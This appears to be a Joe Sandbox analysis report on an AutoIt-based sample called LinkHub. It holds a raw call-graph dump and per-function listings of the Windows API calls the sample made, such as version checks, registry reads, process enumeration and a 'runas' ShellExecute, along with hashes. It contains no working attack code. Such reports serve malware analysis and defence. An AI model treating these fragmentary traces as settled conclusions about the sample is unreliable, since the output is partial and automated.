ca8fb2 104480->104491 104482 ca9519 104483 c9dcc5 __fread_nolock 26 API calls 104482->104483 104482->104485 104484 ca9545 104483->104484 104484->104485 104486 c9dcc5 __fread_nolock 26 API calls 104484->104486 104487 ca9553 104486->104487 104487->104485 104488 c9dcc5 __fread_nolock 26 API calls 104487->104488 104489 ca9563 104488->104489 104490 c9dcc5 __fread_nolock 26 API calls 104489->104490 104490->104485 104492 ca8fbe CallCatchBlock 104491->104492 104493 ca8fde 104492->104493 104494 ca8fc6 104492->104494 104496 ca90a4 104493->104496 104501 ca9017 104493->104501 104525 c9f636 20 API calls _abort 104494->104525 104532 c9f636 20 API calls _abort 104496->104532 104498 ca8fcb 104526 c9f649 20 API calls _abort 104498->104526 104499 ca90a9 104533 c9f649 20 API calls _abort 104499->104533 104502 ca903b 104501->104502 104503 ca9026 104501->104503 104524 ca54ba EnterCriticalSection 104502->104524 104527 c9f636 20 API calls _abort 104503->104527 104505 ca8fd3 __fread_nolock 104505->104482 104508 ca9033 104534 ca2b5c 26 API calls _abort 104508->104534 104509 ca902b 104528 c9f649 20 API calls _abort 104509->104528 104510 ca9041 104512 ca905d 104510->104512 104513 ca9072 104510->104513 104529 c9f649 20 API calls _abort 104512->104529 104516 ca90c5 __fread_nolock 38 API calls 104513->104516 104520 ca906d 104516->104520 104517 ca9062 104530 c9f636 20 API calls _abort 104517->104530 104531 ca909c LeaveCriticalSection __wsopen_s 104520->104531 104521->104475 104522->104485 104523->104477 104524->104510 104525->104498 104526->104505 104527->104509 104528->104508 104529->104517 104530->104520 104531->104505 104532->104499 104533->104508 104534->104505 104535 c736f5 104538 c7370f 104535->104538 104539 c73726 104538->104539 104540 c7372b 104539->104540 104541 c7378a 104539->104541 104578 c73788 104539->104578 104542 c73804 PostQuitMessage 104540->104542 104543 c73738 104540->104543 104545 c73790 104541->104545 104546 cb3df4 104541->104546 104579 c73709 104542->104579 104547 c73743 104543->104547 104548 cb3e61 104543->104548 104544 c7376f DefWindowProcW 104544->104579 104550 c73797 104545->104550 104551 c737bc SetTimer RegisterWindowMessageW 104545->104551 104587 c72f92 10 API calls 104546->104587 104552 c7380e 104547->104552 104553 c7374d 104547->104553 104590 cdc8f7 66 API calls ___scrt_fastfail 104548->104590 104557 c737a0 KillTimer 104550->104557 104558 cb3d95 104550->104558 104554 c737e5 CreatePopupMenu 104551->104554 104551->104579 104585 c8fcad 59 API calls ___scrt_fastfail 104552->104585 104560 cb3e46 104553->104560 104561 c73758 104553->104561 104554->104579 104556 cb3e15 104588 c8f23c 41 API calls 104556->104588 104559 c73907 Shell_NotifyIconW 104557->104559 104565 cb3d9a 104558->104565 104566 cb3dd0 MoveWindow 104558->104566 104567 c737b3 104559->104567 104560->104544 104589 cd1423 22 API calls 104560->104589 104568 c73763 104561->104568 104569 c737f2 104561->104569 104562 cb3e73 104562->104544 104562->104579 104571 cb3dbf SetFocus 104565->104571 104572 cb3da0 104565->104572 104566->104579 104583 c759ff DeleteObject DestroyWindow 104567->104583 104568->104544 104580 c73907 Shell_NotifyIconW 104568->104580 104584 c7381f 76 API calls ___scrt_fastfail 104569->104584 104570 c73802 104570->104579 104571->104579 104572->104568 104573 cb3da9 104572->104573 104586 c72f92 10 API calls 104573->104586 104578->104544 104581 cb3e3a 104580->104581 104582 c7396b 61 API calls 104581->104582 104582->104578 104583->104579 104584->104570 104585->104570 104586->104579 104587->104556 104588->104568 104589->104578 104590->104562 104591 c71033 104596 c768b4 104591->104596 104595 c71042 104597 c7bf73 22 API calls 104596->104597 104598 c76922 104597->104598 104604 c7589f 104598->104604 104601 c769bf 104602 c71038 104601->104602 104607 c76b14 22 API calls __fread_nolock 104601->104607 104603 c90413 29 API calls __onexit 104602->104603 104603->104595 104608 c758cb 104604->104608 104607->104601 104609 c758be 104608->104609 104610 c758d8 104608->104610 104609->104601 104610->104609 104611 c758df RegOpenKeyExW 104610->104611 104611->104609 104612 c758f9 RegQueryValueExW 104611->104612 104613 c7592f RegCloseKey 104612->104613 104614 c7591a 104612->104614 104613->104609 104614->104613 104615 c80ebf 104616 c80ed3 104615->104616 104622 c81425 104615->104622 104617 c9014b 22 API calls 104616->104617 104620 c80ee5 104616->104620 104617->104620 104618 cc562c 104651 ce1b14 22 API calls 104618->104651 104620->104618 104621 c80f3e 104620->104621 104650 c7b4c8 22 API calls 104620->104650 104624 c82b20 191 API calls 104621->104624 104627 c8049d ISource 104621->104627 104622->104620 104625 c7bed9 22 API calls 104622->104625 104647 c80376 ISource 104624->104647 104625->104620 104626 cc632b 104655 ce3fe1 82 API calls __wsopen_s 104626->104655 104629 c81695 104629->104627 104634 c7bed9 22 API calls 104629->104634 104630 c9014b 22 API calls 104630->104647 104632 cc625a 104654 ce3fe1 82 API calls __wsopen_s 104632->104654 104633 cc5cdb 104633->104627 104637 c7bed9 22 API calls 104633->104637 104634->104627 104637->104627 104638 c7bed9 22 API calls 104638->104647 104639 c905b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 104639->104647 104641 c7bf73 22 API calls 104641->104647 104642 c80aae ISource 104653 ce3fe1 82 API calls __wsopen_s 104642->104653 104643 c90568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 104643->104647 104644 cc6115 104652 ce3fe1 82 API calls __wsopen_s 104644->104652 104646 c90413 29 API calls pre_c_initialization 104646->104647 104647->104626 104647->104627 104647->104629 104647->104630 104647->104632 104647->104633 104647->104638 104647->104639 104647->104641 104647->104642 104647->104643 104647->104644 104647->104646 104648 c81990 191 API calls 2 library calls 104647->104648 104649 c81e50 41 API calls ISource 104647->104649 104648->104647 104649->104647 104650->104620 104651->104627 104652->104642 104653->104627 104654->104627 104655->104627 104656 c815ff 104663 c8e3d5 104656->104663 104658 c81615 104672 c8e439 104658->104672 104660 c8163f 104684 ce3fe1 82 API calls __wsopen_s 104660->104684 104662 cc6207 104664 c8e3e3 104663->104664 104665 c8e3f6 104663->104665 104685 c7b4c8 22 API calls 104664->104685 104667 c8e429 104665->104667 104668 c8e3fb 104665->104668 104686 c7b4c8 22 API calls 104667->104686 104670 c9014b 22 API calls 104668->104670 104671 c8e3ed 104670->104671 104671->104658 104673 c77ad5 22 API calls 104672->104673 104674 c8e470 104673->104674 104675 c7b329 22 API calls 104674->104675 104677 c8e4a1 104674->104677 104676 cce53e 104675->104676 104687 c77bb5 22 API calls 104676->104687 104677->104660 104679 cce549 104688 c8e7c1 40 API calls 104679->104688 104681 cce55c 104683 cce560 104681->104683 104689 c7b4c8 22 API calls 104681->104689 104683->104683 104684->104662 104685->104671 104686->104671 104687->104679 104688->104681 104689->104683 104690 c7dd3d 104691 c7dd63 104690->104691 104692 cc19c2 104690->104692 104694 c9014b 22 API calls 104691->104694 104713 c7dead 104691->104713 104693 cc1a46 104692->104693 104696 cc1a82 104692->104696 104701 cc1a26 104692->104701 104698 cc1a7d 104693->104698 104736 ce3fe1 82 API calls __wsopen_s 104693->104736 104700 c7dd8d 104694->104700 104737 ce3fe1 82 API calls __wsopen_s 104696->104737 104697 c9017b 22 API calls 104708 c7dee4 __fread_nolock 104697->104708 104703 c9014b 22 API calls 104700->104703 104700->104708 104735 c8e6e8 191 API calls 104701->104735 104704 c7dddb 104703->104704 104704->104701 104706 c7de16 104704->104706 104705 c9017b 22 API calls 104705->104708 104707 c80340 191 API calls 104706->104707 104709 c7de29 104707->104709 104708->104693 104708->104705 104709->104698 104709->104708 104710 cc1aa5 104709->104710 104711 c7de77 104709->104711 104714 c7d526 104709->104714 104738 ce3fe1 82 API calls __wsopen_s 104710->104738 104711->104713 104711->104714 104713->104697 104715 c9014b 22 API calls 104714->104715 104716 c7d589 104715->104716 104717 c7c32d 22 API calls 104716->104717 104718 c7d5b3 104717->104718 104719 c9014b 22 API calls 104718->104719 104725 c7d66e ISource 104719->104725 104721 c7bed9 22 API calls 104721->104725 104724 cc1f79 104740 cd56ae 22 API calls ISource 104724->104740 104725->104721 104725->104724 104726 cc1f94 104725->104726 104729 c7d911 ISource 104725->104729 104732 c7c3ab 22 API calls ISource 104725->104732 104739 c7b4c8 22 API calls 104725->104739 104730 c7d9ac ISource 104729->104730 104733 c7c3ab 22 API calls ISource 104729->104733 104731 c7d9c3 104730->104731 104734 c8e30a 22 API calls ISource 104730->104734 104732->104725 104733->104730 104734->104730 104735->104693 104736->104698 104737->104698 104738->104698 104739->104725 104740->104726 104741 c7f4dc 104744 c7cab0 104741->104744 104745 c7cacb 104744->104745 104746 cc150c 104745->104746 104747 cc14be 104745->104747 104774 c7caf0 104745->104774 104784 cf62ff 191 API calls 2 library calls 104746->104784 104750 cc14c8 104747->104750 104753 cc14d5 104747->104753 104747->104774 104782 cf6790 191 API calls 104750->104782 104752 c8bc58 22 API calls 104752->104774 104765 c7cdc0 104753->104765 104783 cf6c2d 191 API calls 2 library calls 104753->104783 104757 cc179f 104757->104757 104759 c7cdee 104761 cc16e8 104787 cf6669 82 API calls 104761->104787 104764 c7be2d 40 API calls 104764->104774 104765->104759 104788 ce3fe1 82 API calls __wsopen_s 104765->104788 104769 c7cf80 40 API calls 104769->104774 104770 c8e807 40 API calls 104770->104774 104771 c80340 191 API calls 104771->104774 104772 c7bed9 22 API calls 104772->104774 104774->104752 104774->104759 104774->104761 104774->104764 104774->104765 104774->104769 104774->104770 104774->104771 104774->104772 104775 c8e7c1 40 API calls 104774->104775 104776 c8aa99 191 API calls 104774->104776 104777 c905b2 5 API calls __Init_thread_wait 104774->104777 104778 c90413 29 API calls __onexit 104774->104778 104779 c90568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104774->104779 104780 c8f4df 82 API calls 104774->104780 104781 c8f346 191 API calls 104774->104781 104785 c7b4c8 22 API calls 104774->104785 104786 ccffaf 22 API calls 104774->104786 104775->104774 104776->104774 104777->104774 104778->104774 104779->104774 104780->104774 104781->104774 104782->104753 104783->104765 104784->104774 104785->104774 104786->104774 104787->104765 104788->104757 104789 cce737 104790 cce6e4 104789->104790 104793 cde83e SHGetFolderPathW 104790->104793 104792 cce6ed 104792->104792 104794 c78577 22 API calls 104793->104794 104795 cde86b 104794->104795 104795->104792 104796 c7105b 104801 c752a7 104796->104801 104798 c7106a 104832 c90413 29 API calls __onexit 104798->104832 104800 c71074 104802 c752b7 __wsopen_s 104801->104802 104803 c7bf73 22 API calls 104802->104803 104804 c7536d 104803->104804 104805 c75594 24 API calls 104804->104805 104806 c75376 104805->104806 104833 c75238 104806->104833 104809 c76b7c 22 API calls 104810 c7538f 104809->104810 104811 c76a7c 22 API calls 104810->104811 104812 c7539e 104811->104812 104813 c7bf73 22 API calls 104812->104813 104814 c753a7 104813->104814 104815 c7bd57 22 API calls 104814->104815 104816 c753b0 RegOpenKeyExW 104815->104816 104817 cb4be6 RegQueryValueExW 104816->104817 104821 c753d2 104816->104821 104818 cb4c7c RegCloseKey 104817->104818 104819 cb4c03 104817->104819 104818->104821 104831 cb4c8e _wcslen 104818->104831 104820 c9017b 22 API calls 104819->104820 104822 cb4c1c 104820->104822 104821->104798 104824 c7423c 22 API calls 104822->104824 104823 c7655e 22 API calls 104823->104831 104825 cb4c27 RegQueryValueExW 104824->104825 104826 cb4c44 104825->104826 104828 cb4c5e ISource 104825->104828 104827 c78577 22 API calls 104826->104827 104827->104828 104828->104818 104829 c7b329 22 API calls 104829->104831 104830 c76a7c 22 API calls 104830->104831 104831->104821 104831->104823 104831->104829 104831->104830 104832->104800 104834 cb22d0 __wsopen_s 104833->104834 104835 c75245 GetFullPathNameW 104834->104835 104836 c75267 104835->104836 104837 c78577 22 API calls 104836->104837 104838 c75285 104837->104838 104838->104809 104839 cc5650 104840 c8e3d5 22 API calls 104839->104840 104841 cc5666 104840->104841 104845 cc56e1 104841->104845 104848 c8aa65 23 API calls 104841->104848 104843 cc56c1 104843->104845 104849 ce247e 22 API calls 104843->104849 104847 cc61d7 104845->104847 104850 ce3fe1 82 API calls __wsopen_s 104845->104850 104848->104843 104849->104845 104850->104847 104851 c71098 104856 c75fc8 104851->104856 104855 c710a7 104857 c7bf73 22 API calls 104856->104857 104858 c75fdf GetVersionExW 104857->104858 104859 c78577 22 API calls 104858->104859 104860 c7602c 104859->104860 104861 c7adf4 22 API calls 104860->104861 104871 c76062 104860->104871 104862 c76056 104861->104862 104863 c755dc 22 API calls 104862->104863 104863->104871 104864 c7611c GetCurrentProcess IsWow64Process 104865 c76138 104864->104865 104866 cb5269 GetSystemInfo 104865->104866 104867 c76150 LoadLibraryA 104865->104867 104868 c76161 GetProcAddress 104867->104868 104869 c7619d GetSystemInfo 104867->104869 104868->104869 104873 c76171 GetNativeSystemInfo 104868->104873 104870 c76177 104869->104870 104874 c7109d 104870->104874 104875 c7617b FreeLibrary 104870->104875 104871->104864 104872 cb5224 104871->104872 104873->104870 104876 c90413 29 API calls __onexit 104874->104876 104875->104874 104876->104855

                                                                    Executed Functions

                                                                    Function 00C75FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 234 c75fc8-c76037 call c7bf73 GetVersionExW call c78577 239 cb507d-cb5090 234->239 240 c7603d 234->240 241 cb5091-cb5095 239->241 242 c7603f-c76041 240->242 243 cb5098-cb50a4 241->243 244 cb5097 241->244 245 c76047-c760a6 call c7adf4 call c755dc 242->245 246 cb50bc 242->246 243->241 247 cb50a6-cb50a8 243->247 244->243 258 c760ac-c760ae 245->258 259 cb5224-cb522b 245->259 250 cb50c3-cb50cf 246->250 247->242 249 cb50ae-cb50b5 247->249 249->239 253 cb50b7 249->253 254 c7611c-c76136 GetCurrentProcess IsWow64Process 250->254 253->246 256 c76195-c7619b 254->256 257 c76138 254->257 260 c7613e-c7614a 256->260 257->260 261 c760b4-c760b7 258->261 262 cb5125-cb5138 258->262 263 cb524b-cb524e 259->263 264 cb522d 259->264 265 cb5269-cb526d GetSystemInfo 260->265 266 c76150-c7615f LoadLibraryA 260->266 261->254 267 c760b9-c760f5 261->267 268 cb513a-cb5143 262->268 269 cb5161-cb5163 262->269 271 cb5239-cb5241 263->271 272 cb5250-cb525f 263->272 270 cb5233 264->270 273 c76161-c7616f GetProcAddress 266->273 274 c7619d-c761a7 GetSystemInfo 266->274 267->254 276 c760f7-c760fa 267->276 277 cb5150-cb515c 268->277 278 cb5145-cb514b 268->278 279 cb5198-cb519b 269->279 280 cb5165-cb517a 269->280 270->271 271->263 272->270 281 cb5261-cb5267 272->281 273->274 282 c76171-c76175 GetNativeSystemInfo 273->282 275 c76177-c76179 274->275 289 c76182-c76194 275->289 290 c7617b-c7617c FreeLibrary 275->290 283 c76100-c7610a 276->283 284 cb50d4-cb50e4 276->284 277->254 278->254 287 cb519d-cb51b8 279->287 288 cb51d6-cb51d9 279->288 285 cb517c-cb5182 280->285 286 cb5187-cb5193 280->286 281->271 282->275 283->250 292 c76110-c76116 283->292 295 cb50f7-cb5101 284->295 296 cb50e6-cb50f2 284->296 285->254 286->254 293 cb51ba-cb51c0 287->293 294 cb51c5-cb51d1 287->294 288->254 291 cb51df-cb5206 288->291 290->289 297 cb5208-cb520e 291->297 298 cb5213-cb521f 291->298 292->254 293->254 294->254 299 cb5103-cb510f 295->299 300 cb5114-cb5120 295->300 296->254 297->254 298->254 299->254 300->254
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 00C75FF7
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                    • GetCurrentProcess.KERNEL32(?,00D0DC2C,00000000,?,?), ref: 00C76123
                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00C7612A
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00C76155
                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C76167
                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00C76175
                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 00C7617C
                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 00C761A1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                    • API String ID: 3290436268-3101561225
                                                                    • Opcode ID: d1b47fe34378e1c4aa185f88973b1a4a46cfd6813647cb7f699442fd914d91e7
                                                                    • Instruction ID: 61644d07eda1a7613d8e7a465521346ec8f061f6316a92371e7772296b5e79ef
                                                                    • Opcode Fuzzy Hash: d1b47fe34378e1c4aa185f88973b1a4a46cfd6813647cb7f699442fd914d91e7
                                                                    • Instruction Fuzzy Hash: C7A16C2A81A7C08FC715DFAA7C4D2B97E756B27340F88889DF485D7322C6694948CF36
                                                                    Function 00C7338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00C73368,?), ref: 00C733BB
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00C73368,?), ref: 00C733CE
                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00D42418,00D42400,?,?,?,?,?,?,00C73368,?), ref: 00C7343A
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                      • Part of subcall function 00C7425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C73462,00D42418,?,?,?,?,?,?,?,00C73368,?), ref: 00C742A0
                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001,00D42418,?,?,?,?,?,?,?,00C73368,?), ref: 00C734BB
                                                                    • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00CB3CB0
                                                                    • SetCurrentDirectoryW.KERNEL32(?,00D42418,?,?,?,?,?,?,?,00C73368,?), ref: 00CB3CF1
                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00D331F4,00D42418,?,?,?,?,?,?,?,00C73368), ref: 00CB3D7A
                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00CB3D81
                                                                      • Part of subcall function 00C734D3: GetSysColorBrush.USER32(0000000F), ref: 00C734DE
                                                                      • Part of subcall function 00C734D3: LoadCursorW.USER32(00000000,00007F00), ref: 00C734ED
                                                                      • Part of subcall function 00C734D3: LoadIconW.USER32(00000063), ref: 00C73503
                                                                      • Part of subcall function 00C734D3: LoadIconW.USER32(000000A4), ref: 00C73515
                                                                      • Part of subcall function 00C734D3: LoadIconW.USER32(000000A2), ref: 00C73527
                                                                      • Part of subcall function 00C734D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C7353F
                                                                      • Part of subcall function 00C734D3: RegisterClassExW.USER32(?), ref: 00C73590
                                                                      • Part of subcall function 00C735B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C735E1
                                                                      • Part of subcall function 00C735B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C73602
                                                                      • Part of subcall function 00C735B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00C73368,?), ref: 00C73616
                                                                      • Part of subcall function 00C735B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00C73368,?), ref: 00C7361F
                                                                      • Part of subcall function 00C7396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C73A3C
                                                                    Strings
                                                                    • AutoIt, xrefs: 00CB3CA5
                                                                    • runas, xrefs: 00CB3D75
                                                                    • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00CB3CAA
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                    • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                    • API String ID: 683915450-2030392706
                                                                    • Opcode ID: adc346158d3cbd86b2f157205be35a5e13f2e293391c364596614a219b522b49
                                                                    • Instruction ID: 41cf158f52a1d399a15a93fde91fcc26d8c572d1e9c48a364fe962b0686722cd
                                                                    • Opcode Fuzzy Hash: adc346158d3cbd86b2f157205be35a5e13f2e293391c364596614a219b522b49
                                                                    • Instruction Fuzzy Hash: 9451E7711083806FC705EFB4DC05D7A7FA99B95750F40851DF59D922A2DB248A49AB32
                                                                    Function 00CDDD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1637 cddd87-cdddcf CreateToolhelp32Snapshot Process32FirstW call cde80e 1640 cdde7d-cdde80 1637->1640 1641 cdddd4-cddde3 Process32NextW 1640->1641 1642 cdde86-cdde95 CloseHandle 1640->1642 1641->1642 1643 cddde9-cdde58 call c7bf73 * 2 call c7b329 call c7568e call c7bd98 call c77bb5 call c8e36b 1641->1643 1658 cdde5a-cdde5c 1643->1658 1659 cdde62-cdde69 1643->1659 1660 cdde5e-cdde60 1658->1660 1661 cdde6b-cdde78 call c7bd98 * 2 1658->1661 1659->1661 1660->1659 1660->1661 1661->1640
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00CDDDAC
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00CDDDBA
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00CDDDDA
                                                                    • CloseHandle.KERNELBASE(00000000), ref: 00CDDE87
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 420147892-0
                                                                    • Opcode ID: 6f18e18d7a1e991a9f7e714f2440fd6d976efbdf733f807181093cd9ff8f212f
                                                                    • Instruction ID: 3f85521a3d0de07a9e84fa275060ba31d37e201a9846d1109fac6df301cf76b8
                                                                    • Opcode Fuzzy Hash: 6f18e18d7a1e991a9f7e714f2440fd6d976efbdf733f807181093cd9ff8f212f
                                                                    • Instruction Fuzzy Hash: EC3193711083009FD310EF60C885BAFBBE8EF99350F44492EF586872A1DB719E45DB92
                                                                    Function 00C95058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000003,?,00C9502E,00000003,00D398D8,0000000C,00C95185,00000003,00000002,00000000,?,00CA2C59,00000003), ref: 00C95079
                                                                    • TerminateProcess.KERNEL32(00000000,?,00C9502E,00000003,00D398D8,0000000C,00C95185,00000003,00000002,00000000,?,00CA2C59,00000003), ref: 00C95080
                                                                    • ExitProcess.KERNEL32 ref: 00C95092
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: c44d3f1a48a8f80fe21f42d3996fb85c36e14c11fe15eeaddfdf681a60f9c9b0
                                                                    • Instruction ID: 6349f3c026f17b43c93465fb34b7a80777d9d49a5d84390552f8d0a5c820cd1c
                                                                    • Opcode Fuzzy Hash: c44d3f1a48a8f80fe21f42d3996fb85c36e14c11fe15eeaddfdf681a60f9c9b0
                                                                    • Instruction Fuzzy Hash: 77E04631000748AFCF226FA0ED0CE483B6AEB10381F004015F9498A221DB36EE42DBD0
                                                                    Function 00C7EE4C Relevance: 21.6, APIs: 14, Instructions: 613windowsleeptimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetInputState.USER32 ref: 00C7EF07
                                                                    • timeGetTime.WINMM ref: 00C7F107
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C7F228
                                                                    • TranslateMessage.USER32(?), ref: 00C7F27B
                                                                    • DispatchMessageW.USER32(?), ref: 00C7F289
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C7F29F
                                                                    • Sleep.KERNEL32(0000000A), ref: 00C7F2B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                    • String ID:
                                                                    • API String ID: 2189390790-0
                                                                    • Opcode ID: f2cbe845af4fec81aac52a558ad8345fb4e3da78e345036c1dcdead3e2afb9d1
                                                                    • Instruction ID: 2659a8dec5cf41370a31a517d87fd750359f166e7227e086848fd8f61642d4a8
                                                                    • Opcode Fuzzy Hash: f2cbe845af4fec81aac52a558ad8345fb4e3da78e345036c1dcdead3e2afb9d1
                                                                    • Instruction Fuzzy Hash: 8D32DD70604341EFD728CF24C894FAABBE5BF81304F14C56DE569872A2C771EA85CB92
                                                                    Function 00C73624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00C73657
                                                                    • RegisterClassExW.USER32(00000030), ref: 00C73681
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C73692
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00C736AF
